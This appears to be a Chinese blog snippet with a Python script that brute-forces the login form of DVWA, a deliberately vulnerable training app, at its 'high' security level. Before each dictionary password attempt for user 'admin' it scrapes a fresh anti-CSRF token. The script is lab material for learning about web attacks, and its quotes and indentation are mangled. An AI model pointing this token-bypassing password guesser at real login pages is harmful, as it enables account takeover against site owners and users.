python3脚本如下:

/usr/bin/python3
#coding: utf-8
#–meiying–

import requests,sys,re,time

def getToken():#获取token

url=”http://www.dvwa.com/vulnerabilities/brute/index.php”
header={

“Host”: “www.dvwa.com”,
“Cache-Control”: “max-age=0”,
“Upgrade-Insecure-Requests”: “1”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8”,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “zh-CN,zh;q=0.9”,
“Cookie”: “PHPSESSID=lgib05f3fq42hq63neendasqcq; security=high “,

}

rsp=requests.get(url,headers=header)
rsp.encoding=’utf-8′
html=rsp.text
#print(html)
s=r'(value=\’.*\’)’
pattern=re.compile(s,re.I)
token=pattern.findall(html)
token=token[0]
s=r'(\’.*\’)’
pattern=re.compile(s,re.I)
token=pattern.findall(token)
token=token[0]
token=eval(token)
return token

def getForm(psswd,token):#提交认证密码是否正确

header={

“Host”: “www.dvwa.com “,
“Upgrade-Insecure-Requests”: “1”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8”,
“Referer”: “http://www.dvwa.com/vulnerabilities/brute/index.php”,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “zh-CN,zh;q=0.9”,
“Cookie”: “PHPSESSID=lgib05f3fq42hq63neendasqcq; security=high”

}
url=”http://www.dvwa.com/vulnerabilities/brute/index.php?username=admin&password={0}&Login=Login&user_token={1}#”.format(psswd,token)
rsp=requests.get(url,headers=header)
rsp.encoding=’utf-8′
html=rsp.text
print(url)
print(header)
print(len(html))

if __name__==”__main__”:

with open(‘zidian2.txt’,’rt’) as f:

for line in f:

line=line.strip(‘\n’)
line=str(line)
token=getToken()
getForm(line,token)

 

#读取字典文件每一行,进行提交,根据返回结果判断密码是否正确,高级难度中加入了token做为认证所以需要请求页面取出token,在进行提交认证